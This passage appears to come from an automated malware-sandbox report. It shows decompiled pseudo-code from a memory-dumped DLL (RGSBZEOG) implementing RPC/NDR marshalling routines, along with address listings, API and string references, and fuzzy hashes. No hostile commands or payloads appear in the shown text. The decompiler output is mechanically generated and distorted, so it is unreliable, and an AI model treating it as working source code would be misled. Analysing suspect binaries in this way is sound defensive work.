						__eax = E6F1D73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
						__edx = _a8;
						__eax =  *(__edx + 4);
						_v20 =  *(__edx + 4);
						__ecx = _a12;
						__edx =  *_a12;
						_v36 =  *_a12;
						__eax = _a8;
						__ecx =  *(__eax + 0x44);
						_v44 =  *(__eax + 0x44);
						_v32 = 0;
						while(1) {
							__eax = _v32;
							__eflags = _v32 - _v44;
							if(_v32 >= _v44) {
								break;
							}
							__ecx = _a20 & 0x000000ff;
							__edx = _a16;
							__eax = _v36;
							__ecx = _a8;
							_v36 = E6F1D9560(_a8, _v36, _a16, 0, _a20 & 0x000000ff);
							__edx = _v32;
							__edx = _v32 + 1;
							__eflags = __edx;
							_v32 = __edx;
						}
						__edx = _a8;
						 *(__edx + 4) =  *(__edx + 4) - _v20;
						return  *(__edx + 4) - _v20;
					case 3:
						__eax = _a4 & 0x000000ff;
						__eflags = (_a4 & 0x000000ff) - 0x22;
						if((_a4 & 0x000000ff) != 0x22) {
							__edx = 2;
							_v12 = __dx;
						} else {
							__ecx = 1;
							_v12 = __cx;
						}
						__eax = _a8;
						__ecx =  *(_a8 + 0x3c);
						__edx = _a8;
						E6F1DA540( *(_a8 + 0x3c), _a8, 0,  *(_a8 + 0x3c)) = 1;
						__eax = 1 << 0;
						__ecx = _a16;
						__edx =  *(__ecx + (1 << 0)) & 0x000000ff;
						__eflags = ( *(__ecx + (1 << 0)) & 0x000000ff) - 0x44;
						if(( *(__ecx + (1 << 0)) & 0x000000ff) != 0x44) {
							__eax = _a8;
							__ecx = _a8;
							__edx =  *(__eax + 0x3c);
							__eflags =  *(__eax + 0x3c) -  *((intOrPtr*)(__ecx + 0x44));
							if( *(__eax + 0x3c) !=  *((intOrPtr*)(__ecx + 0x44))) {
								__eax = _a8;
								__ecx =  *(__eax + 0x3c);
								_push( *(__eax + 0x3c));
								__edx = _a8;
								__eax =  *(__edx + 0x44);
								_push( *(__edx + 0x44));
								_push("buffer size %d must equal memory size %ld for non-sized conformant strings\n");
								0x6f1d0000();
								__esp = __esp + 0xc;
								_push(0x6c6);
								__eax =  *0x6f1d0000();
							}
						}
						__ecx = _a8;
						__eflags =  *(__ecx + 0x40);
						if( *(__ecx + 0x40) != 0) {
							__edx = _a8;
							__eax =  *(__edx + 0x40);
							_push( *(__edx + 0x40));
							_push("conformant strings can\'t have Offset (%d)\n");
							0x6f1d0000();
							__esp = __esp + 8;
							_push(0x6c6);
							__eax =  *0x6f1d0000();
						}
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12 & 0x0000ffff;
						_v24 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						__ecx = _a8;
						__edx =  *(_a8 + 0x44);
						__eax = _v12 & 0x0000ffff;
						_v16 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
						__ecx = _v12 & 0x0000ffff;
						__edx = _v16;
						_a8 = E6F1DB0C0(_v12 & 0x0000ffff, _a8, _v16, _v12 & 0x0000ffff);
						__ecx = _a28 & 0x000000ff;
						__eflags = _a28 & 0x000000ff;
						if((_a28 & 0x000000ff) == 0) {
							L44:
							__eax = _v16;
							return _v16;
						} else {
							__edx = _a20 & 0x000000ff;
							__eflags = _a20 & 0x000000ff;
							if((_a20 & 0x000000ff) == 0) {
								__eax = _a24 & 0x000000ff;
								__eflags = _a24 & 0x000000ff;
								if((_a24 & 0x000000ff) == 0) {
									L36:
									__ecx = _a12;
									__eflags =  *_a12;
									if( *_a12 == 0) {
										__edx = _v24;
										_push(_v24);
										__eax = _a8;
										_push(_a8);
										__eax =  *0x6f1d0000();
										__ecx = _a12;
										 *_a12 = _a8;
									}
									L38:
									__edx = _a12;
									__eax = _a8;
									__ecx =  *_a12;
									__eflags =  *_a12 -  *((intOrPtr*)(__eax + 4));
									if( *_a12 !=  *((intOrPtr*)(__eax + 4))) {
										__ecx = _v16;
										__edx = _a12;
										__eax =  *_a12;
										__ecx = _a8;
										__eax = E6F1DAFA0(_a8,  *_a12, _v16);
									} else {
										__edx = _v16;
										_a8 = E6F1DAF00(_a8, _v16);
									}
									__edx = _a16;
									__eax =  *_a16 & 0x000000ff;
									__eflags = __eax - 0x22;
									if(__eax != 0x22) {
										__eax = _a12;
										__ecx =  *__eax;
										_push( *__eax);
										0x6f1d0000();
										__esp = __esp + 4;
										_push(__eax);
										_push("string=%s\n");
										0x6f1d0000();
										__esp = __esp + 8;
									} else {
										__ecx = _a12;
										__edx =  *_a12;
										_push( *_a12);
										0x6f1d0000();
										__esp = __esp + 4;
										_push(__eax);
										_push("string=%s\n");
										0x6f1d0000();
										__esp = __esp + 8;
									}
									goto L44;
								}
								__ecx = _a8;
								__edx =  *(__ecx + 0x20) & 0x000000ff;
								__eflags =  *(__ecx + 0x20) & 0x000000ff;
								if(( *(__ecx + 0x20) & 0x000000ff) != 0) {
									goto L36;
								}
								__eax = _a12;
								__eflags =  *_a12;
								if( *_a12 != 0) {
									goto L36;
								}
								__ecx = _a8;
								__edx = _a8;
								__eax =  *(__ecx + 0x3c);
								__eflags =  *(__ecx + 0x3c) -  *(__edx + 0x44);
								if( *(__ecx + 0x3c) !=  *(__edx + 0x44)) {
									goto L36;
								}
								__ecx = _a12;
								__edx = _a8;
								__eax =  *(__edx + 4);
								 *_a12 =  *(__edx + 4);
								goto L38;
							}
							__eax = _v24;
							_push(_v24);
							__ecx = _a8;
							_push(_a8);
							__eax =  *0x6f1d0000();
							__edx = _a12;
							 *_a12 = _v24;
							goto L38;
						}
					case 4:
						goto L57;
				}
			}













                                                                                              0x6f1dd83a
                                                                                              0x6f1dd843
                                                                                              0x6f1dd84a
                                                                                              0x6f1ddde7
                                                                                              0x6f1dddf1
                                                                                              0x00000000
                                                                                              0x6f1dddfe
                                                                                              0x6f1dd853
                                                                                              0x6f1dd85a
                                                                                              0x00000000
                                                                                              0x6f1dd868
                                                                                              0x6f1dd87e
                                                                                              0x6f1dd895
                                                                                              0x6f1dd89b
                                                                                              0x6f1dd8b1
                                                                                              0x6f1dd8c0
                                                                                              0x6f1dd8c5
                                                                                              0x6f1dd8ce
                                                                                              0x6f1dd991
                                                                                              0x00000000
                                                                                              0x6f1dd8d4
                                                                                              0x6f1dd8da
                                                                                              0x6f1dd8f7
                                                                                              0x6f1dd8f9
                                                                                              0x6f1dd8fb
                                                                                              0x6f1dd902
                                                                                              0x6f1dd904
                                                                                              0x6f1dd909
                                                                                              0x6f1dd90c
                                                                                              0x6f1dd917
                                                                                              0x6f1dd917
                                                                                              0x6f1dd90c
                                                                                              0x6f1dd904
                                                                                              0x6f1dd8dc
                                                                                              0x6f1dd8e4
                                                                                              0x6f1dd8e9
                                                                                              0x6f1dd8ef
                                                                                              0x6f1dd8ef
                                                                                              0x6f1dd91f
                                                                                              0x6f1dd92a
                                                                                              0x6f1dd938
                                                                                              0x6f1dd952
                                                                                              0x6f1dd95f
                                                                                              0x6f1dd963
                                                                                              0x6f1dd964
                                                                                              0x6f1dd969
                                                                                              0x6f1dd979
                                                                                              0x6f1dd989
                                                                                              0x6f1dd98e
                                                                                              0x00000000
                                                                                              0x6f1dd979
                                                                                              0x00000000
                                                                                              0x6f1dd999
                                                                                              0x6f1dd99c
                                                                                              0x6f1dd9a0
                                                                                              0x6f1dd9a9
                                                                                              0x6f1dd9ac
                                                                                              0x6f1dd9b3
                                                                                              0x6f1dd9b6
                                                                                              0x6f1dd9bc
                                                                                              0x6f1dd9c0
                                                                                              0x6f1dd9cc
                                                                                              0x6f1dd9cf
                                                                                              0x6f1dd9d2
                                                                                              0x6f1dd9d6
                                                                                              0x6f1dd9da
                                                                                              0x6f1dd9e6
                                                                                              0x6f1dd9e9
                                                                                              0x6f1dd9f1
                                                                                              0x6f1dd9f5
                                                                                              0x6f1dd9fd
                                                                                              0x6f1dda00
                                                                                              0x6f1dda04
                                                                                              0x6f1dda11
                                                                                              0x6f1dda14
                                                                                              0x6f1dda17
                                                                                              0x6f1dda1b
                                                                                              0x6f1dda28
                                                                                              0x6f1dda2b
                                                                                              0x6f1dda2f
                                                                                              0x6f1dda31
                                                                                              0x6f1dda37
                                                                                              0x6f1dda3a
                                                                                              0x6f1dda3d
                                                                                              0x6f1dda40
                                                                                              0x6f1dda44
                                                                                              0x6f1dda46
                                                                                              0x6f1dda48
                                                                                              0x6f1dda4b
                                                                                              0x6f1dda4e
                                                                                              0x6f1dda50
                                                                                              0x6f1dda50
                                                                                              0x6f1dda4e
                                                                                              0x6f1dda54
                                                                                              0x6f1dda58
                                                                                              0x6f1dda5a
                                                                                              0x6f1dda5c
                                                                                              0x6f1dda60
                                                                                              0x6f1dda64
                                                                                              0x6f1dda6c
                                                                                              0x6f1dda6f
                                                                                              0x6f1dda6f
                                                                                              0x6f1dda71
                                                                                              0x6f1dda74
                                                                                              0x6f1dda77
                                                                                              0x6f1dda7a
                                                                                              0x6f1dda7e
                                                                                              0x6f1dda8a
                                                                                              0x6f1dda8d
                                                                                              0x6f1dda90
                                                                                              0x6f1dda93
                                                                                              0x6f1dda98
                                                                                              0x6f1dda9c
                                                                                              0x6f1dda9f
                                                                                              0x6f1ddaa2
                                                                                              0x6f1ddaa6
                                                                                              0x6f1ddaaa
                                                                                              0x6f1ddab2
                                                                                              0x6f1ddab6
                                                                                              0x6f1ddaba
                                                                                              0x6f1ddabf
                                                                                              0x6f1ddabf
                                                                                              0x6f1ddac3
                                                                                              0x6f1ddac8
                                                                                              0x6f1ddacb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddcb9
                                                                                              0x6f1ddcbc
                                                                                              0x6f1ddcc3
                                                                                              0x6f1ddcc6
                                                                                              0x6f1ddccc
                                                                                              0x6f1ddcd0
                                                                                              0x6f1ddcdc
                                                                                              0x6f1ddcdf
                                                                                              0x6f1ddce2
                                                                                              0x6f1ddce6
                                                                                              0x6f1ddcea
                                                                                              0x6f1ddcf6
                                                                                              0x6f1ddcf9
                                                                                              0x6f1ddcfc
                                                                                              0x6f1ddcfd
                                                                                              0x6f1ddd00
                                                                                              0x6f1ddd01
                                                                                              0x6f1ddd06
                                                                                              0x6f1ddd09
                                                                                              0x6f1ddd0d
                                                                                              0x6f1ddd10
                                                                                              0x6f1ddd14
                                                                                              0x6f1ddd21
                                                                                              0x6f1ddd24
                                                                                              0x6f1ddd28
                                                                                              0x6f1ddd2a
                                                                                              0x6f1ddd2c
                                                                                              0x6f1ddd3b
                                                                                              0x6f1ddd40
                                                                                              0x6f1ddd43
                                                                                              0x6f1ddd47
                                                                                              0x6f1ddd49
                                                                                              0x6f1ddd4b
                                                                                              0x6f1ddd4e
                                                                                              0x6f1ddd51
                                                                                              0x6f1ddd53
                                                                                              0x6f1ddd53
                                                                                              0x6f1ddd51
                                                                                              0x6f1ddd57
                                                                                              0x6f1ddd5b
                                                                                              0x6f1ddd5d
                                                                                              0x6f1ddd5f
                                                                                              0x6f1ddd63
                                                                                              0x6f1ddd67
                                                                                              0x6f1ddd6f
                                                                                              0x6f1ddd72
                                                                                              0x6f1ddd72
                                                                                              0x6f1ddd74
                                                                                              0x6f1ddd79
                                                                                              0x6f1ddd7c
                                                                                              0x6f1ddd80
                                                                                              0x6f1ddd88
                                                                                              0x6f1ddd8b
                                                                                              0x6f1ddd8e
                                                                                              0x6f1ddd91
                                                                                              0x6f1ddd94
                                                                                              0x6f1ddd96
                                                                                              0x6f1ddd99
                                                                                              0x6f1ddd9c
                                                                                              0x6f1ddd9f
                                                                                              0x6f1ddda2
                                                                                              0x6f1dddb4
                                                                                              0x6f1dddb4
                                                                                              0x6f1dddb7
                                                                                              0x6f1dddba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1dddbc
                                                                                              0x6f1dddc3
                                                                                              0x6f1dddc7
                                                                                              0x6f1dddcb
                                                                                              0x6f1dddd7
                                                                                              0x6f1dddab
                                                                                              0x6f1dddae
                                                                                              0x6f1dddae
                                                                                              0x6f1dddb1
                                                                                              0x6f1dddb1
                                                                                              0x6f1ddddc
                                                                                              0x6f1ddde2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddad3
                                                                                              0x6f1ddad7
                                                                                              0x6f1ddada
                                                                                              0x6f1ddae7
                                                                                              0x6f1ddaec
                                                                                              0x6f1ddadc
                                                                                              0x6f1ddadc
                                                                                              0x6f1ddae1
                                                                                              0x6f1ddae1
                                                                                              0x6f1ddaf0
                                                                                              0x6f1ddaf3
                                                                                              0x6f1ddaf9
                                                                                              0x6f1ddb05
                                                                                              0x6f1ddb0a
                                                                                              0x6f1ddb0d
                                                                                              0x6f1ddb10
                                                                                              0x6f1ddb14
                                                                                              0x6f1ddb17
                                                                                              0x6f1ddb19
                                                                                              0x6f1ddb1c
                                                                                              0x6f1ddb1f
                                                                                              0x6f1ddb22
                                                                                              0x6f1ddb25
                                                                                              0x6f1ddb27
                                                                                              0x6f1ddb2a
                                                                                              0x6f1ddb2d
                                                                                              0x6f1ddb2e
                                                                                              0x6f1ddb31
                                                                                              0x6f1ddb34
                                                                                              0x6f1ddb35
                                                                                              0x6f1ddb3a
                                                                                              0x6f1ddb3f
                                                                                              0x6f1ddb42
                                                                                              0x6f1ddb47
                                                                                              0x6f1ddb47
                                                                                              0x6f1ddb25
                                                                                              0x6f1ddb4d
                                                                                              0x6f1ddb50
                                                                                              0x6f1ddb54
                                                                                              0x6f1ddb56
                                                                                              0x6f1ddb59
                                                                                              0x6f1ddb5c
                                                                                              0x6f1ddb5d
                                                                                              0x6f1ddb62
                                                                                              0x6f1ddb67
                                                                                              0x6f1ddb6a
                                                                                              0x6f1ddb6f
                                                                                              0x6f1ddb6f
                                                                                              0x6f1ddb75
                                                                                              0x6f1ddb78
                                                                                              0x6f1ddb7c
                                                                                              0x6f1ddb89
                                                                                              0x6f1ddb8c
                                                                                              0x6f1ddb8f
                                                                                              0x6f1ddb93
                                                                                              0x6f1ddba0
                                                                                              0x6f1ddba3
                                                                                              0x6f1ddba8
                                                                                              0x6f1ddbb0
                                                                                              0x6f1ddbb8
                                                                                              0x6f1ddbbc
                                                                                              0x6f1ddbbe
                                                                                              0x6f1ddcac
                                                                                              0x6f1ddcac
                                                                                              0x00000000
                                                                                              0x6f1ddbc4
                                                                                              0x6f1ddbc4
                                                                                              0x6f1ddbc8
                                                                                              0x6f1ddbca
                                                                                              0x6f1ddbe1
                                                                                              0x6f1ddbe5
                                                                                              0x6f1ddbe7
                                                                                              0x6f1ddc17
                                                                                              0x6f1ddc17
                                                                                              0x6f1ddc1a
                                                                                              0x6f1ddc1d
                                                                                              0x6f1ddc1f
                                                                                              0x6f1ddc22
                                                                                              0x6f1ddc23
                                                                                              0x6f1ddc26
                                                                                              0x6f1ddc27
                                                                                              0x6f1ddc2d
                                                                                              0x6f1ddc30
                                                                                              0x6f1ddc30
                                                                                              0x6f1ddc32
                                                                                              0x6f1ddc32
                                                                                              0x6f1ddc35
                                                                                              0x6f1ddc38
                                                                                              0x6f1ddc3a
                                                                                              0x6f1ddc3d
                                                                                              0x6f1ddc51
                                                                                              0x6f1ddc55
                                                                                              0x6f1ddc58
                                                                                              0x6f1ddc5b
                                                                                              0x6f1ddc5f
                                                                                              0x6f1ddc3f
                                                                                              0x6f1ddc3f
                                                                                              0x6f1ddc47
                                                                                              0x6f1ddc4c
                                                                                              0x6f1ddc67
                                                                                              0x6f1ddc6a
                                                                                              0x6f1ddc6d
                                                                                              0x6f1ddc70
                                                                                              0x6f1ddc90
                                                                                              0x6f1ddc93
                                                                                              0x6f1ddc95
                                                                                              0x6f1ddc96
                                                                                              0x6f1ddc9b
                                                                                              0x6f1ddc9e
                                                                                              0x6f1ddc9f
                                                                                              0x6f1ddca4
                                                                                              0x6f1ddca9
                                                                                              0x6f1ddc72
                                                                                              0x6f1ddc72
                                                                                              0x6f1ddc75
                                                                                              0x6f1ddc77
                                                                                              0x6f1ddc78
                                                                                              0x6f1ddc7d
                                                                                              0x6f1ddc80
                                                                                              0x6f1ddc81
                                                                                              0x6f1ddc86
                                                                                              0x6f1ddc8b
                                                                                              0x6f1ddc8b
                                                                                              0x00000000
                                                                                              0x6f1ddc70
                                                                                              0x6f1ddbe9
                                                                                              0x6f1ddbec
                                                                                              0x6f1ddbf0
                                                                                              0x6f1ddbf2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddbf4
                                                                                              0x6f1ddbf7
                                                                                              0x6f1ddbfa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddbfc
                                                                                              0x6f1ddbff
                                                                                              0x6f1ddc02
                                                                                              0x6f1ddc05
                                                                                              0x6f1ddc08
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1ddc0a
                                                                                              0x6f1ddc0d
                                                                                              0x6f1ddc10
                                                                                              0x6f1ddc13
                                                                                              0x00000000
                                                                                              0x6f1ddc13
                                                                                              0x6f1ddbcc
                                                                                              0x6f1ddbcf
                                                                                              0x6f1ddbd0
                                                                                              0x6f1ddbd3
                                                                                              0x6f1ddbd4
                                                                                              0x6f1ddbda
                                                                                              0x6f1ddbdd
                                                                                              0x00000000
                                                                                              0x6f1ddbdd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: copying %p to %p$unknown array format 0x%x
                                                                                              • API String ID: 4104443479-2029649059
                                                                                              • Opcode ID: 1b22611a1824101af84e3c400166c9435807708d1df8a5f7a187ce76d3662346
                                                                                              • Instruction ID: ec250e651c3eeefaa742c469d60da20c43345619613443135beb1bfc99400ae2
                                                                                              • Opcode Fuzzy Hash: 1b22611a1824101af84e3c400166c9435807708d1df8a5f7a187ce76d3662346
                                                                                              • Instruction Fuzzy Hash: 99A170B5A04249AFCB04CFA8D890DAE7BB6BF89344F14C159FC159B341D735EA21CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D3AA0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 201COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E6F1D3AA0(signed int _a4, intOrPtr* _a8, signed short* _a12, signed int _a16) {
				signed char* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t116;
				char _t125;
				intOrPtr _t137;
				intOrPtr _t140;
				void* _t152;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t221;

				_v12 = _a12[1] & 0x0000ffff;
				_v8 = 0;
				_v24 = 0;
				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v36 = 0;
				_v16 = 0;
				0x6f1d0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t219 = _t218 + 0x14;
				_t116 = _a4;
				_t223 =  *((intOrPtr*)(_t116 + 0x34));
				if( *((intOrPtr*)(_t116 + 0x34)) == 0) {
					_v48 =  *((intOrPtr*)(_a4 + 0x30));
					_v20 =  *((intOrPtr*)(_a4 + 4));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					E6F1D5F90(_t223, _a4, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v48;
					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
					0x6f1d0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) - _v20);
					_t219 = _t219 + 8;
					_v44 = 1;
					 *((intOrPtr*)(_a4 + 4)) = _v20;
				}
				E6F1D73D0(( *(_a12 + (1 << 0)) & 0x000000ff) + 1, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
				_t220 = _t219 + 8;
				_a12 =  &(_a12[2]);
				if( *_a12 != 0) {
					_v8 = _a12 +  *_a12;
				}
				_a12 =  &(_a12[1]);
				if(( *_a12 & 0x0000ffff) != 0) {
					_v24 = _a12 + ( *_a12 & 0x0000ffff);
				}
				_a12 =  &(_a12[1]);
				if(_v8 != 0) {
					_t140 = E6F1DD650( *_v8 & 0x000000ff, _a4, _v8);
					_t220 = _t220 + 0xc;
					_v16 = _t140;
					_v12 = _v12 + _v16;
					_v28 =  *((intOrPtr*)(_a4 + 0x3c));
					_v32 =  *((intOrPtr*)(_a4 + 0x44));
					_v36 =  *((intOrPtr*)(_a4 + 0x40));
				}
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					_t137 = E6F1DA3B0(_a4, _a4, _v12);
					_t220 = _t220 + 8;
					 *_a8 = _t137;
				}
				_t125 = E6F1D9560(_a4,  *_a8, _a12, _v24, _a16 & 0x000000ff);
				_t221 = _t220 + 0x14;
				_v40 = _t125;
				if(_v8 != 0) {
					 *((intOrPtr*)(_a4 + 0x3c)) = _v28;
					 *((intOrPtr*)(_a4 + 0x44)) = _v32;
					 *((intOrPtr*)(_a4 + 0x40)) = _v36;
					if((_a16 & 0x000000ff) != 0) {
						E6F1E0730(_v40, 0, _v16);
						_t221 = _t221 + 0xc;
					}
					E6F1DD830(_t152, _t216, _t217,  *_v8 & 0x000000ff, _a4,  &_v40, _v8, 0, 0, 1);
				}
				if(_v44 != 0) {
					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
					 *((intOrPtr*)(_a4 + 0x34)) = 0;
				}
				return 0;
			}

























                                                                                              0x6f1d3aad
                                                                                              0x6f1d3ab0
                                                                                              0x6f1d3ab7
                                                                                              0x6f1d3abe
                                                                                              0x6f1d3ac5
                                                                                              0x6f1d3acc
                                                                                              0x6f1d3ad3
                                                                                              0x6f1d3ada
                                                                                              0x6f1d3af7
                                                                                              0x6f1d3afc
                                                                                              0x6f1d3aff
                                                                                              0x6f1d3b02
                                                                                              0x6f1d3b06
                                                                                              0x6f1d3b0e
                                                                                              0x6f1d3b17
                                                                                              0x6f1d3b1d
                                                                                              0x6f1d3b2c
                                                                                              0x6f1d3b37
                                                                                              0x6f1d3b43
                                                                                              0x6f1d3b55
                                                                                              0x6f1d3b5a
                                                                                              0x6f1d3b5d
                                                                                              0x6f1d3b6a
                                                                                              0x6f1d3b6a
                                                                                              0x6f1d3b87
                                                                                              0x6f1d3b8c
                                                                                              0x6f1d3b95
                                                                                              0x6f1d3ba0
                                                                                              0x6f1d3bab
                                                                                              0x6f1d3bab
                                                                                              0x6f1d3bb4
                                                                                              0x6f1d3bbf
                                                                                              0x6f1d3bca
                                                                                              0x6f1d3bca
                                                                                              0x6f1d3bd3
                                                                                              0x6f1d3bda
                                                                                              0x6f1d3bf4
                                                                                              0x6f1d3bf9
                                                                                              0x6f1d3bfc
                                                                                              0x6f1d3c05
                                                                                              0x6f1d3c0e
                                                                                              0x6f1d3c17
                                                                                              0x6f1d3c20
                                                                                              0x6f1d3c20
                                                                                              0x6f1d3c29
                                                                                              0x6f1d3c33
                                                                                              0x6f1d3c33
                                                                                              0x6f1d3c3d
                                                                                              0x6f1d3c47
                                                                                              0x6f1d3c4c
                                                                                              0x6f1d3c52
                                                                                              0x6f1d3c52
                                                                                              0x6f1d3c6b
                                                                                              0x6f1d3c70
                                                                                              0x6f1d3c73
                                                                                              0x6f1d3c7a
                                                                                              0x6f1d3c82
                                                                                              0x6f1d3c8b
                                                                                              0x6f1d3c94
                                                                                              0x6f1d3c9d
                                                                                              0x6f1d3ca9
                                                                                              0x6f1d3cae
                                                                                              0x6f1d3cae
                                                                                              0x6f1d3cd3
                                                                                              0x6f1d3cd8
                                                                                              0x6f1d3cdf
                                                                                              0x6f1d3cea
                                                                                              0x6f1d3cf0
                                                                                              0x6f1d3cf0
                                                                                              0x6f1d3cfc

                                                                                              APIs
                                                                                              • _NdrComplexStructMemorySize@8.RGSBZEOG(?,?), ref: 6F1D3B2C
                                                                                              • _memset.LIBCMT ref: 6F1D3CA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ComplexMemorySize@8Struct_memset
                                                                                              • String ID: (%p,%p,%p,%d)$difference = 0x%x
                                                                                              • API String ID: 4515687-1755659387
                                                                                              • Opcode ID: e0917642c0f95e4584e08a17328e0bd08be052706335859f3822370c8e4a7bd7
                                                                                              • Instruction ID: 0483b64c185050d1386547bed58aacffd291043ea7cfd1e6d904bc25ef3d5c9f
                                                                                              • Opcode Fuzzy Hash: e0917642c0f95e4584e08a17328e0bd08be052706335859f3822370c8e4a7bd7
                                                                                              • Instruction Fuzzy Hash: 6391E7B4A00249AFDB04CF58C890BEEBBB5BF88344F148159F8599B385D775EA51CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D863F, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F1D8794
                                                                                              Strings
                                                                                              • flags: 0x%02x, xrefs: 6F1D875A
                                                                                              • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6F1D8713
                                                                                              • invalid format type %x, xrefs: 6F1D8732
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ClientContextMarshall@12
                                                                                              • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                              • API String ID: 935922980-1391298755
                                                                                              • Opcode ID: 5e17fd02c22dea6387143984c12dace28545aa4e5e257f86e7a3cb9e988ee96e
                                                                                              • Instruction ID: 922d2988747ef0b6f9a098f15f8c277bea5609b18749072b85665677c34af39e
                                                                                              • Opcode Fuzzy Hash: 5e17fd02c22dea6387143984c12dace28545aa4e5e257f86e7a3cb9e988ee96e
                                                                                              • Instruction Fuzzy Hash: 1811E2B12082946BD708CF69CC60FAB7BB5EF86390F048199FCA48B285D535E530CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D3D00, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 137COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 44%
                                                                                              			E6F1D3D00(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				signed char* _v8;
				signed int _v12;
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _t81;
				void* _t125;
				void* _t126;
				void* _t127;

				_v8 = _a12;
				0x6f1d0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t126 = _t125 + 0x14;
				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
					E6F1D73D0(_a4 + 4, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					_t127 = _t126 + 8;
					if(( *_v8 & 0x000000ff) != 0x1d) {
						_v20 = _a12;
						_v12 =  *((intOrPtr*)(_v20 + 2));
						_a12 = _v20 + 6;
					} else {
						_v12 = _v8[2] & 0x0000ffff;
						_a12 =  &(_v8[4]);
					}
					if((_a16 & 0x000000ff) == 0) {
						if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
							 *_a8 =  *((intOrPtr*)(_a4 + 4));
						}
					} else {
						_t81 = E6F1DA3B0(_a4, _a4, _v12);
						_t127 = _t127 + 8;
						 *_a8 = _t81;
					}
